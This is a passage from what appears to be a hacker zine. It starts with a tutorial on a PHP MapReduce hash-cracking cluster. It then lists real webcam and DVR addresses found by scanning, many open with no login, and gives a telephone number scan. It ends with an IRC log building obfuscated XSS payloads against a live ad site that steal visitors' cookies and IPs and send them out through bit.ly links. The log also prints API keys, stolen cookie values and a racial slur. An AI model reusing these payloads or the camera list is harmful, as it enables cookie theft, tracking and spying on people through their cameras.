|in a filesystem (unstructured) or within a database (structured).
|                                                                        - Wikipedia

Now that that's out of the way, let's move on to real code and see how this works in the given implementation. Firstly, what software is providing the backend infrastructure? The implementation relies on the following:

  Web server: Apache or whatever you have, as long as it supports PHP.
  MySQL

That's it. The clients run from php-cli but can also be called by the web server if desired. The MySQL tables that the scripts interact with are very simple:

/------------------------------------------------------------------------------------
| CREATE TABLE IF NOT EXISTS `node` (
|   `id` varchar(32) NOT NULL,
|   `type` int(11) NOT NULL,
|   `job_id` varchar(32) NOT NULL,
|   `last_connect` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
|   UNIQUE KEY `id` (`id`)
| ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
|
| CREATE TABLE IF NOT EXISTS `job` (
|   `id` varchar(32) NOT NULL,
|   `status` int(11) NOT NULL,
|   `time_added` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
|   `mappers` int(11) NOT NULL,
|   `reducers` int(11) NOT NULL,
|   `time_started` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
|   PRIMARY KEY (`id`)
| ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
|

These tables provide the necessary framework for this given implementation, while demonstrating simple MapReduce structure in an obvious yet functional manner. Should MapReduce be used in a production environment, a more efficient, scientifically-designed framework should be used.
Additionally, high-performance applications should most likely not be written in an interpreted language.

Obviously, these tables are of no use without the scripts that interact with the database. The main script that facilitates this interaction is 'stat.php'. It provides the channel through which the nodes talk with the master: in most cases, it keeps track of each node's last connect time and assigns it the role of either 'mapper' or 'reducer'. The code is straightforward, and the source should be relatively self-explanatory by scanning over it.

So, the next step is to determine the method of relaying data between master and node. The data is structured in EL markup files, which look suspiciously similar to existing markup languages like HTML and XML:

/------------------------------------------------------------------------------------
|
|     <id>ec366edc8a513f467af89f2e5cd9f37a</id>
|     <type>SET</type>
|     <payload>
|         85103e20ac8441af181b15f58fc53b08
|     </payload>
|

The "id" tag contains the ID of the node. The "type" tag tells the node to perform a specific action, in this case, to set its "job_id" to the payload. The "payload" tag holds the data that will be assigned to a variable stored on the node. It is named such that the variable is assigned correctly. In this particular packet, the information between the opening and closing "payload" tags is an MD5 hash, though it does not always have to be. However, the protocol requires that the payload be alphanumeric (containing only numbers or letters). If the "type" tag is set to "FILE", then the payload should be treated as Base64-encoded data. This protocol is simple but allows for easy parsing and greater flexibility.

Here is an example handshake performed between node and master.
This handshake is initiated by a node upon startup to seek new jobs:

Node -> Master:
/---------------------------------------------------------------------------------------------\
|http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=starting|
\---------------------------------------------------------------------------------------------/

Master -> Node:
/-------------------------------------------------\
|  <id>ec366edc8a513f467af89f2e5cd9f37a</id>      |
|  <type>REQUEST</type>                           |
\-------------------------------------------------/

Node -> Master:
/--------------------------------------------------------------------------------------------\
|http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=whatami|
\--------------------------------------------------------------------------------------------/

Master -> Node:
/-------------------------------------------------\
|  <id>ec366edc8a513f467af89f2e5cd9f37a</id>      |
|  <type>SET</type>                               |
|  <payload>                                      |
|    reducer                                      |
|  </payload>                                     |
\-------------------------------------------------/

Node -> Master:
/--------------------------------------------------------------------------------------------\
|http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=looking|
\--------------------------------------------------------------------------------------------/

Master -> Node:
/-------------------------------------------------\
|  <id>ec366edc8a513f467af89f2e5cd9f37a</id>      |
|  <type>SET</type>                               |
|  <payload>                                      |
|    85103e20ac8441af181b15f58fc53b08             |
|  </payload>                                     |
\-------------------------------------------------/

Once the node has received a job, it will send another request to the master for the script and data files. The job files, which contain the split-up work, are then stored in a folder specific to that job_id.
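As an added example (not code from the article or its source package), here is a Python encoder/decoder for the EL packet format described above. The id, type and payload tags are the ones the article names; the enclosing root tag name ("packet"), the REQUEST type carrying an empty payload, and the helper names are assumptions made for this example. The point it makes is that the alphanumeric rule, and the Base64 rule for FILE, are enforced by the receiving node as well, not only by the master that builds the packet.

```python
import base64
import binascii
import re

# The article names the "id", "type" and "payload" tags; the enclosing root
# tag is not recoverable from the text, so "packet" is an assumption here.
ROOT_TAG = "packet"
ALNUM = re.compile(r"^[A-Za-z0-9]*$")   # protocol rule: payloads are alphanumeric
TYPE_RE = re.compile(r"^[A-Z]+$")       # REQUEST, SET, FILE, ...


class ELError(ValueError):
    """Raised when a packet violates the EL protocol rules."""


def build_packet(node_id, ptype, payload=""):
    """Serialise a node id, a type and a payload into one EL packet.

    FILE packets carry raw bytes, Base64-encoded as the article describes;
    every other type must carry a purely alphanumeric string (possibly
    empty, as in the REQUEST packet of the handshake).
    """
    if not node_id or not ALNUM.match(node_id):
        raise ELError("node id must be alphanumeric")
    if not TYPE_RE.match(ptype):
        raise ELError("type must be an upper-case word")
    if ptype == "FILE":
        if not isinstance(payload, bytes):
            raise ELError("FILE payload must be bytes")
        body = base64.b64encode(payload).decode("ascii")
    else:
        if not isinstance(payload, str) or not ALNUM.match(payload):
            raise ELError("payload must be alphanumeric")
        body = payload
    return (
        f"<{ROOT_TAG}>\r\n"
        f"\t<id>{node_id}</id>\r\n"
        f"\t<type>{ptype}</type>\r\n"
        f"\t<payload>\r\n\t\t{body}\r\n\t</payload>\r\n"
        f"</{ROOT_TAG}>"
    )


def _tag(text, name):
    """Return the stripped text between <name> and </name>, or raise."""
    m = re.search(rf"<{name}>(.*?)</{name}>", text, re.S)
    if m is None:
        raise ELError(f"missing <{name}> tag")
    return m.group(1).strip()


def parse_packet(text):
    """Parse an EL packet and enforce the same rules on the receiving side.

    Checking here matters more than on the sender: the node stores the
    payload into one of its own variables according to the type, so anything
    outside the expected alphabet is rejected before that assignment happens.
    """
    node_id = _tag(text, "id")
    ptype = _tag(text, "type")
    body = _tag(text, "payload")
    if not node_id or not ALNUM.match(node_id):
        raise ELError("node id must be alphanumeric")
    if not TYPE_RE.match(ptype):
        raise ELError("bad type")
    if ptype == "FILE":
        try:
            payload = base64.b64decode(body, validate=True)
        except binascii.Error as exc:
            raise ELError("FILE payload is not valid Base64") from exc
    else:
        if not ALNUM.match(body):
            raise ELError("payload must be alphanumeric")
        payload = body
    return {"id": node_id, "type": ptype, "payload": payload}


if __name__ == "__main__":
    pkt = build_packet("ec366edc8a513f467af89f2e5cd9f37a", "SET",
                       "85103e20ac8441af181b15f58fc53b08")
    print(pkt)
    print(parse_packet(pkt))
```

The decoder deliberately rejects a SET payload such as a relative path or a string containing a semicolon, which is what protects a node that builds file paths or variable assignments out of the payload.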
To retrieve job files from the folder, the following script is used:

/------------------------------------------------------------------------------------
|#job_chunks.php
|# $id (the requesting node) and $job_id are set by the including script from
|# the request; note that $job_id is used unvalidated in a filesystem path
|# (see issue 3 below).
|$dir = opendir( "./chunks/$job_id" );
|
|if( $dir )
|{
|  # Skip over "." and ".." until a real chunk file is found.
|  do
|  {
|    $thing = readdir( $dir );
|
|    # readdir() returns false once the directory is exhausted: the job is
|    # done, so remove its (now empty) chunk folder and stop.  The strict
|    # comparison matters; with == a chunk file named "0" would end the job.
|    if( $thing === false )
|    {
|      closedir( $dir );
|      rmdir( "./chunks/$job_id" );
|      die;
|    }
|
|    if( $thing == "." || $thing == ".." )
|      continue;
|    else
|      break;
|
|  }while( true );
|
|  if( $thing && $thing != "." && $thing != ".." )
|  {
|    # Wrap the chunk as an EL packet of type FILE (payload is Base64).
|    $output = "\r\n";                       # packet opening tag (elided)
|    $output .= "\t<id>$id</id>\r\n";
|    $output .= "\t<type>FILE</type>\r\n";
|    $output .= "\t<payload>\r\n";
|    $output .= "\t\t".base64_encode( file_get_contents( "./chunks/$job_id/$thing" ) )."\r\n";
|    $output .= "\t</payload>\r\n";
|    $output .= "";                          # packet closing tag (elided)
|    # The chunk is deleted as soon as it is read, so it is handed out once.
|    unlink( "./chunks/$job_id/$thing" );
|    closedir( $dir );
|    echo $output;
|  }
|}
|

This code grabs the next chunk from the directory and wraps it as an EL packet, where the output is then sent to the node. From here, mapper nodes will process this chunk of data and start a small, one-time-use web server. The reducer nodes request the IP:PORT of a mapper node, grabbing the result. After doing so, they further process the data and upload their results to the master. The master does a final reduction step on the reduced results and produces a final, usable result that is downloaded by the administrator.

Although very much functional, the implementation that is given with this article possesses a few inherent issues:

1) If a node does not complete a job, then that node's results are lost.
2) There is no redundancy of nodes.
3) The code as a whole was not written with security in mind. Testing should only be performed on a private network.
4) It uses HTTP to transfer messages, which makes the code easy to write in exchange for introducing an enormous amount of overhead.
5) Speed gains from distributing the cracking process among multiple nodes are negated by the fact that nodes request chunks more quickly than other nodes are able to download them, resulting in multiple nodes receiving the same chunk. Requesting a chunk is not a "blocking" operation. This resulted in a dirty code hack using random sleep times.

With that being said, this project still serves as a good learning tool to those interested in the MapReduce algorithm.

Download the source package for this article:
http://www.gonullyourself.org/zine/4/MapReduce.tar.gz
MD5sum:  d985ffa4b2fcd63d2a6275697acf252e
SHA1sum: fb798594216e87b51fd194db1a31e580ebe47a7d

A few things need to be done first before testing this code. First, the config.ini files should be updated to point to the URL of your web server and the folder the MapReduce code is installed in. The default is "http://127.0.0.1/map_reduce_zine". Once the configs have been updated correctly, the nodes are ready to run; however, the master must be set up first. Import and create the tables in map_reduce.sql. To make sure the master runs without problems, just be lazy and chmod 777 all the directories. For what we're doing, it really doesn't matter. Now, all the configurations are complete.

To test the MapReduce cluster, initialize two or more nodes locally by running the "client.php" file in each of the "testing" folders. Once they are running, they will begin to poll the master for work. To add a job to the cluster, navigate to "add_job.php" in your browser. From here, add the corresponding files from the "example" directory. Once a job is added, the nodes will automatically grab the work script and any data needed to perform the job. Once the nodes are done with their work, they will begin to poll for new jobs. The example scripts and data recover the plaintext string "elchupathingy" from the hash in "node_script.php".
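Issue 5 above is a race: two nodes asking for a chunk at the same moment can both be handed it, because nothing serialises the requests. The dispenser below is an added example in Python, not part of the article's source package, showing the usual fix: every claim happens under a lock, and each handed-out chunk is leased, so a chunk whose node never reports back (issue 1) is re-issued when its lease expires instead of being lost. The chunk names, node names, lease length and the simulated cluster are all constructed for the example.

```python
import threading
import time


class ChunkDispenser:
    """Hand out job chunks so that no two nodes ever receive the same one.

    Every claim takes a lock, so a burst of concurrent requests is serialised
    (the "blocking" behaviour the article's implementation lacks).  A claimed
    chunk is leased for a limited time; if the node never reports completion
    the lease expires and the chunk goes back into the pending queue.
    """

    def __init__(self, chunk_names, lease_seconds=30.0, clock=time.monotonic):
        self._lock = threading.Lock()
        self._pending = list(chunk_names)   # not yet handed out
        self._leased = {}                   # chunk -> (node_id, deadline)
        self._done = set()
        self._lease_seconds = lease_seconds
        self._clock = clock                 # injectable for deterministic tests

    def _recycle_expired(self, now):
        # Caller holds the lock.  Expired leases return to the queue.
        for name, (_node, deadline) in list(self._leased.items()):
            if deadline <= now:
                del self._leased[name]
                self._pending.append(name)

    def claim(self, node_id):
        """Atomically give node_id one chunk, or None when nothing is pending."""
        with self._lock:
            now = self._clock()
            self._recycle_expired(now)
            if not self._pending:
                return None
            name = self._pending.pop(0)
            self._leased[name] = (node_id, now + self._lease_seconds)
            return name

    def complete(self, node_id, name):
        """Record a finished chunk; stale or foreign reports are ignored."""
        with self._lock:
            lease = self._leased.get(name)
            if lease is None or lease[0] != node_id:
                return False
            del self._leased[name]
            self._done.add(name)
            return True

    def finished(self):
        with self._lock:
            return not self._pending and not self._leased

    def done_count(self):
        with self._lock:
            return len(self._done)


def run_cluster(n_chunks=200, n_nodes=8):
    """Simulate n_nodes greedy nodes polling one dispenser.

    Returns the list of every chunk name that was claimed (in claim order)
    together with the dispenser, so callers can check for duplicates.
    """
    dispenser = ChunkDispenser(f"chunk{i:04d}" for i in range(n_chunks))
    claimed, claimed_lock = [], threading.Lock()

    def node(node_id):
        while True:
            name = dispenser.claim(node_id)
            if name is None:
                return
            with claimed_lock:
                claimed.append(name)
            dispenser.complete(node_id, name)

    threads = [threading.Thread(target=node, args=(f"node{n}",))
               for n in range(n_nodes)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return claimed, dispenser


if __name__ == "__main__":
    claimed, d = run_cluster()
    print(len(claimed), "claims,", len(set(claimed)), "distinct,",
          "finished:", d.finished())
```

In the article's setup the lock would live in the master (a row lock on a chunk table, or an atomic rename of the chunk file out of the job folder), which removes the need for the random sleeps mentioned in issue 5.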
To see if it worked, browse to "show_results.php" and select the link there; it will run the "post-process" script and, in this case, display the plain text. lata, ELChupathingy [==================================================================================================] -=[ 0x09 Camera/DVR Scan -=[ Author: storm -=[ Email: storm@gonullyourself.org -=[ Website: http://gonullyourself.org/ Oh, the joys of nmap. Open access (no login) ---------------------- http://165.98.238.72/view/index.shtml http://165.98.238.75/view/index.shtml http://165.98.238.78/view/index.shtml http://186.1.14.117/view/index.shtml http://24.1.5.61:8082/Simple/index.htm http://24.1.10.154:81/ http://24.1.12.248:1028/ http://24.1.26.48/img/main.cgi?next_file=main.htm http://72.250.135.252:1024/img/image.cgi?next_file=main_fs.htm http://74.237.69.5/main.cgi?next_file=main.htm http://83.227.138.166/main.cgi?next_file=main.htm http://75.61.194.41:1024/main.cgi?next_file=index_in.htm http://193.87.102.25/img/main.cgi?next_file=main.htm http://213.198.245.70/img/main.cgi?next_file=main.htm http://74.237.69.5/main.cgi?next_file=main2.htm http://pineairewebcam.dyndns.org/ http://217.159.181.99/ http://193.138.213.166/ http://72.2.138.209:81/ http://ajs01.dyndns.org/ http://62.106.98.204/ http://80.54.239.234/ http://195.47.194.200/ http://78.36.109.5/ http://www.zodiac-bg.com/files/Jview.htm http://82.107.211.3/ http://84.53.31.54/ http://129.170.124.12/ http://193.178.224.10/ http://chrastal.homeip.net:5050/ http://194.112.215.163/ http://129.70.141.62/ http://209.94.75.172/ http://75.149.126.138:89/ http://67.53.198.178/ http://128.103.101.254/ http://157.157.79.85/ http://208.71.234.122/ http://24.25.42.218:52210/ http://65.182.241.193/ http://216.117.210.183:86/ http://203.213.212.174:1365/ http://142.217.181.117:89/ http://87.243.178.244/ http://81.138.9.30:81/ http://122.3.81.6:82/ http://68.101.243.94:82/ http://80.13.146.246/ http://64.203.239.75/ http://193.251.181.104/ 
http://213.110.240.157/ http://216.160.181.242:10083/ http://67.242.57.128:86/ http://www.rmackey.com/ http://71.194.73.80:4343/ http://209.117.235.143/ http://71.157.136.110:81/ http://216.129.211.131/ http://217.133.212.61/ http://143.107.3.149/ http://210.230.126.237:82/ http://62.147.232.188/ http://216.137.100.129:81/ http://210.230.133.76:82/ http://222.3.77.52:81/ http://222.11.124.75:81/ http://116.64.17.198/ http://210.249.10.81:81/ http://220.217.129.21:81/ http://210.249.21.157:82/ http://222.1.186.218:81/ http://221.119.133.176:81/ http://213.160.168.72/ http://61.204.127.233:82/ http://222.3.114.56:81/ http://71.110.145.16:89/ http://89.234.195.78/ http://99.135.117.196/ http://65.99.253.134/ http://222.11.60.180:81/ http://61.117.29.119:81/ http://82.176.123.82/ http://66.203.223.50:82/ http://24.20.88.10:84/ http://24.19.205.82:8095/ http://59.133.145.190:82/ http://68.16.245.20/ http://220.214.128.66:82/ http://124.105.235.84/ http://222.5.86.181:82/ http://210.169.100.66:82/ http://222.13.239.47:82/ http://208.54.215.145/ http://66.35.88.6/ http://98.112.171.186:81/ http://59.133.146.58:82/ http://195.131.161.122:85/ http://208.71.217.253:50001/ http://220.217.122.193:81/ http://222.15.48.210:82/ http://220.217.130.205:81/ http://98.190.143.254:23/ http://200.124.240.142:8086/ http://70.154.139.169:83/ http://205.250.69.239:81/ http://124.45.116.105:81/ http://61.204.122.175:82/ http://173.46.175.162:32000/ Login required -------------- https://24.206.4.253/index.htm http://24.231.40.38/ http://24.231.41.232/ http://24.231.50.181/ http://24.231.54.90/ http://24.244.132.179/ http://24.244.134.63/ http://24.244.135.87/ http://24.244.135.250/ http://216.137.0.39/auth.html http://216.137.11.89/ http://24.244.145.66:8080/ http://24.244.145.182/ http://24.244.146.129/ http://24.244.146.192/ http://24.244.180.229/ http://64.150.197.130/ http://64.150.207.20/ http://64.150.210.159/ http://64.150.220.6/ http://64.150.220.67/ http://64.150.222.210/ 
http://64.150.231.141/ http://64.150.237.8/ https://64.150.238.144/auth.html http://64.150.245.160/ http://65.75.92.213/ http://65.75.96.59/ http://65.75.107.70/ http://65.75.114.105/ http://65.75.115.236/ http://200.4.168.164/ http://200.80.109.38/ http://186.1.3.18/ http://186.1.3.69/ http://186.1.10.155/ http://190.106.11.19/ http://190.106.11.20/ http://190.106.14.14/ http://190.106.19.67/ http://190.184.94.41/ http://165.98.224.67/ http://165.98.235.2/ http://165.98.236.114/ http://186.1.14.180/ http://186.1.14.181/ http://186.1.14.182/ http://190.106.11.18/ http://190.184.23.39/ http://190.184.35.95/ http://190.184.40.114/ http://190.184.43.97/ http://190.184.45.153/ http://190.184.72.105/ http://190.212.134.190/ http://190.212.134.242/ http://196.200.49.162/ http://24.1.10.135:1050/ http://24.1.13.39:8080/ http://24.1.16.206/ http://186.1.10.156/login.html?1600&1 http://190.106.4.27/ [==================================================================================================] -=[ 0x0a 303-833-00xx Scan -=[ Author: Shadytel, Inc -=[ Website: http://www.shadytel.com/ 0001 - Expanded Announcement System (no supe) 0002 - Ringout 0003 - Ringout 0004 - Ringout 0005 - Reorder via SS7? 0006 - Burst of 2200 hz 0007 - Ringout 0008 - Busy signal via distant end 0009 - 102-type milliwatt, hangs up after ~3 cycles 0010 - Same as 0009 0012 - Busy via SS7 0013 - Coin deposit rec 0018 - LD service restricted rec 0020 - Reorder via SS7 0021 - Ringout 0022 - Ringout 0030 - Ringout 0031 - Ringout 0032 - Ringout 0034 - Ringout 0035 - Ringout 0036 - Ringout 0037 - Ringout 0038 - Modem - 7/E/1, *displays TID:, then garbage, then TID too long. Please try again.* 0039 - Something picks up silently after two rings. Faint clicking noise is sometimes audible. 0041 - Ringout 0057 - 105-type test 0058 - Something via SS7? Recheck 0065 - rec, "Remember, you must dial one plus your area code, or zero plus your area code and the number for long distance and operator assisted calls." 
0066 - Dialing 1/0 not necessary rec
0067 - Dial 1 first rec
0068 - 100-type milliwatt
0069 - Dialing 0 not necessary rec
0070 - YCDNGT
0075 - YCDNGT
0076 - CBCAD/call your operator to help you
0077 - CBCAD/check your instruction manual
0078 - Permanent signal rec
0080 - Low tone
0081 - Same as 0078
0082 - Coin deposit rec
0083 - LD service restricted rec
0084 - CAC error rec
0085 - Tandem CBCAD recording?
0086 - Dialing CAC not necessary rec
0087 - Network difficulties rec
0089 - CAC error rec
0090 - ACB rec
0091 - Busy via SS7
0098 - Reorder via SS7?
0099 - DATU

[==================================================================================================]

-=[ 0x0b bit.ly Shenanigans (aka, XSS is hard bro)
-=[ Author: Silks, elchupathingy
-=[ IRC: irc.gonullyourself.org #gny

Now, while we could neatly explain how we built up our implementation of this trick, it wouldn't really capture our thought process and just general fucking around. At some point, during the early hours of the morning, I pondered the idea of grabbing a fellow #gny chatter's IP for the lulz. Knowing that JavaScript has no reliable function for retrieving a client's IP, the best approach was to use a standard whatismyip.com site to grab the IP. With the IP address theoretically in my hands, I approached elchupathingy for ideas of how to export that information without any server-side ties. After some playing around, we came up with a solution that would gather and store a victim's IP address in a clever manner, and then redirect them to a final destination as expected. Here is our chat log (mildly edited to hide moments of stupidity) which explains how we built this up.

-Silks

Silks: do you know of a site that is like a persistent xss but not even xss?
Silks: will just store info temporary Silks: like Silks: x.php?q=lolIstolethisguysip:1.1.1.1 elchupathingy: could use bit.ly to store it Silks: how so elchupathingy: it stores links you shorten Silks: basically, did you see my XSS, JS+PHP implementation? elchupathingy: don't think so elchupathingy: hmm storing people's info using bit.ly is kind of sly now that i think about it elchupathingy: lol elchupathingy: http://bit.ly/gsfxLp elchupathingy: see what the link expands to Silks: how would you create that though from JS? elchupathingy: one sec elchupathingy: "http://api.bitly.com/v3/shorten?login=$bitlylogin&apiKey=$bitlyapi&format=json&longU rl=http://google.com/search?q=".shit_goes_here Silks: k elchupathingy: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5be2a28cc9f0b2 52495179&format=json&longUrl=http://google.com/search?q=luls elchupathingy: just a GET or inclusion should work Silks: I guess if you can see the details in your bit.ly account that will export the info elchupathingy: http://google.com/search?q=USER:elchupathingy:PASS:lolpasssowrd elchupathingy: thats what it would look like Silks: I know man Silks: but you are ignoring the actual problem Silks: the point is, getting the data from the victims client to you Silks: so if bit.ly account store recently created urls Silks: then you can access that bit.ly and extract the info elchupathingy: ya elchupathingy: woot got the cookie via xss and bit.ly elchupathingy: lol elchupathingy: in a ungodly long xss string Silks: rofl Silks: so like elchupathingy: elchupathingy: lol elchupathingy: ungodly long Silks: win Silks: funny thing is Silks: you can then just bit.ly that long url elchupathingy: exactly lol elchupathingy: and bit.ly will keep track of the people that click on it lol elchupathingy: at the same time of sending you their cookie Silks: guessing the api can retrieve links too Silks: so you can probably write a quick app to grab it back elchupathingy: yep elchupathingy: well 
what ya mean? elchupathingy: short url to the info? Silks: well Silks: say you wanna xss like 100 people Silks: everytime someone gets owned they create a new bit.ly Silks: so you write an app that connects to bit.ly api and retrieves new bit.ly's Silks: and from that grabs the redirect url and parses the data elchupathingy: maybe elchupathingy: have to look over the api real quick Silks: but yeah you can break it down to two commands elchupathingy: can get the countries for each link, statistics on number of clicks and referrrers Silks: bit_xxs_ify Silks: spits out a bit.ly link that links to the long url Silks: I guess somehow you'd need to inject what you want Silks: like "document.cookie" Silks: or just have a menu of all the options Silks: bit_xss_ify cookie Silks: bit_xss_ify ip Silks: etc Silks: then you'd need Silks: bitly_to_data elchupathingy: ok can get the top 100 urls elchupathingy: through their api Silks: which will grab all your bit.ly urls and push new ones into db elchupathingy: http://bit.ly/fUGVEO Silks: pro stream music elchupathingy: click that wanna see if it works Silks: put it in search box Silks: didn't exe Silks: https://api-ssl.bitly.com/v3/user/clicks?access_token=BITLY_ASSIGNED_ACCESS_TOKEN&days=7 Silks: oh nvm elchupathingy: nah got it elchupathingy: __qca=A0-153091312312-1291239025123263; __utmz=201001501.1201336810.6.6|utmccn=(refer ral)|utmcmd=referral|utmcct=/english/4245268-hf-trance-tiesto-vs-mark-knight-feat-din o-beautiful-world-original-mix.html; TRUID=12957903034531; CKTIME=1301436534; __utma= 251001561.940844074.1295790257.1297648116.1301436811.6 Silks: right realtime_links elchupathingy: lol Silks: what's that? elchupathingy: your click Silks: lolz Silks: weird how that was referrer Silks: was from a blank tab elchupathingy: ya elchupathingy: but ya works fine Silks: stop stealing mah cookies elchupathingy: nom nom cookies Silks: ahh it was just cookies Silks: weird, my cookies show all that info? 
:\ elchupathingy: ya Silks: ahh google analytics bs elchupathingy: TRUID=13018098525591; CKTIME=1301809854; popunder=yes; popundr=yes; setover18=1 Silks: tracking cookie elchupathingy: thats mine Silks: check my latest one Silks: sec elchupathingy: http://bit.ly/hbMGMA much better lol Silks: WHY? elchupathingy: cats are awesome elchupathingy: lol elchupathingy: u know elchupathingy: that hurts my feelings Silks: rofl Silks: was trying to tamper data it Silks: but realised that wasn't the actual cookie elchupathingy: oh haha Silks: so just spammed your link Silks: lolz elchupathingy: with hte same thing? Silks: pro music Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179 &format=json&longUrl=http://google.com/search?q=ELCHUPATHINGY_IS_A_NIGGER elchupathingy: doesn't work with the same thing lol Silks: i can change the cookie in tamper data Silks: but Silks: the js is grabbing document.cookie Silks: and I can't change the url Silks: maybe in webgoat but cba loading that elchupathingy: ah elchupathingy: but that hurts elchupathingy: i mean all caps Silks: shutup Silks: you stole my cookies elchupathingy: you clicked the fucking link lol Silks: I trusted you ;( elchupathingy: haha Silks: bah this is so dumb elchupathingy: lol elchupathingy: hmm elchupathingy: but the bit.ly thing is nice because it guarantees unique cookies Silks: what do you mean? 
elchupathingy: it hashes the url elchupathingy: and my username elchupathingy: so if the same person comes to the site the cookie will probably be the same and not be sent again elchupathingy: see if anyone in #gny clicks my link lol Silks: nub Silks: shoulda got it to steal their ip elchupathingy: lol elchupathingy: well too late Silks: can do it later elchupathingy: ya elchupathingy: oh thats cool u can modify what the hashes bit.ly goes to elchupathingy: so u could edit the xss as its happening lol elchupathingy: nvm just title Silks: Silks: weird Silks: fucking ssi shit elchupathingy: ya elchupathingy: well nvm not getting anything from the two clicks lol Silks: hmm elchupathingy: but there seems to be confusion over what it is Silks: that xss, can you get it to alert? elchupathingy: ya it's the same one i used to get your cookie elchupathingy: just have a feeling they are using noscript Silks: where is it executing? elchupathingy: in body Silks: the results span? elchupathingy:
Results for Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Edocument.write(document. cookie);%3C/script%3E Silks: ahh Silks: works Silks: alert doesn't elchupathingy: oh no strings elchupathingy: gets escaped elchupathingy: works Silks: what I just pasted works elchupathingy: ya Silks: weird that document.alert doesn't work Silks: or Silks: yeah i'm just being dumb elchupathingy: lol Silks: hmm Silks: there is one whatismyip site that returns your ip as text with a specific url elchupathingy: ya i used that Silks: link elchupathingy: sec elchupathingy: http://www.whatismyip.com/automation/n09230945.asp Silks: hmm Silks: technically got it working Silks: but getting owned by access-control-allow-origin elchupathingy: getting the ip? or getting it to work as a xss? Silks: printing the ip Silks: once I got it, easymode Silks: that specific XSS site though doesn't allow for it elchupathingy: ah Silks: hmm Silks: but then, that is odd that yours works Silks: ahh, something to do with actually accessing the method Silks: as readystagechange or w/e elchupathingy: im sending the request which is cool Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,4 7,99,104,101,98,107,105,112,46,99,121,110,100,110,115,46,99,111,109,47));x.onreadystatechange =function(){%20alert(x.status);%20};x.send();%3C/script%3E Silks: SAFE Silks: honestly Silks: not a dirty liar like you elchupathingy: lol elchupathingy: 0,0,0,0 Silks: ? elchupathingy: alert boxes Silks: yeah Silks: that's with x.status Silks: should be 200 Silks: if you fire up JS console you will see the error elchupathingy: not getting an error Silks: browser? 
elchupathingy: ff4 Silks: oh it's fucking chrome elchupathingy: im mean i get a error on the page but its there no matter what elchupathingy: $(document).pngFix elchupathingy: is not a function Silks: although it's still not quite right Silks: still should return 200 elchupathingy: ya Silks: well it is grabbing 200 Silks: something up with code Silks: meh down to this origin bs Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH ttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fromCharCode%28104,116,116 ,112,58,47,47,99,104,101,99,106,105,112,46,100,121,110,100,110,115,46,99,111,109,47%29,true%2 9;x.onreadystatechange=function%28%29{if%28x.readyState%20==%204%29%20{%20if%28x.status%20==% 20200%29%20{%20alert%28x.responseText%29;%20}}};x.send%28null%29;%3C/script%3E Silks: code effectively works Silks: well maybe, on another host Silks: but if you can host a file elsewhere then you can either chain JS where it does work or use PHP etc elchupathingy: ya elchupathingy: think i got it elchupathingy: one sec elchupathingy: Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x% 20=%20new%20XMLHttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fr omCharCode%28104,116,116,112,58,47,47,96,111,105,46,104,111,115,116,105,112,46,105,11 0,102,111%29,true%29;x.onreadystatechange%20=function%28%29{if%28x.readyState==4%29{a lert%28x.responseText.match%28new%20RegExp%28String.fromCharCode%2892,100,120,49,44,5 1,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49 ,44,51,125%29%29%29%29;}};x.send%28%29;%3C/script%3E elchupathingy: http://bit.ly/f1Ygcc :D Silks: nice work elchupathingy Barney-: =] Barney-: what happened Silks: umm, we were messing around with XSS Barney-: rgr Silks: now have XSS code that can steal your IP Silks: well, it grabs the IP, gonna add it to what elchu was working on earlier, storing it in bit.ly links Barney-: 
hmm Silks: yeah Barney-, check this Barney-: ?? Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%20=%20new%20XML HttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47, 47,97,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=%2 0function(){if(x.readyState==4){alert(x.responseText);}};x.send();%3C/script%3E Silks: this will print the response page of a whatismyip site Barney-: very cool Silks: I was trying with a different site and it was failing Barney-: thats real cool actually Silks: elchu tried with that one Silks: and then used regex Silks: so Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q= Silks: also we were discussing how to export info and talked about creating bit.ly links with APIs Silks: found out that it is possible to retrieve newly created links in the API too Silks: so.. Barney-: but Barney-: how do you figure out Barney-: the bit.ly link Barney-: after its been created Silks: because of a bit.ly account Silks: so Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179 &format=json&longUrl=http://google.com/search?q= Silks: will create the url Barney-: ah ok ok Barney-: so you login to the account Silks: and you can export the data but adding it to q= Barney-: but we don't want IPs we want coookies Silks: idd Silks: so Silks: if you look at the url above Silks: you just do Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895277c5ce2a29cc9f0b252495179 &format=json&longUrl=http://google.com/search?q= + document.cookie Barney-: ah rgr Silks: specifically that above looks like Silks: String.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4 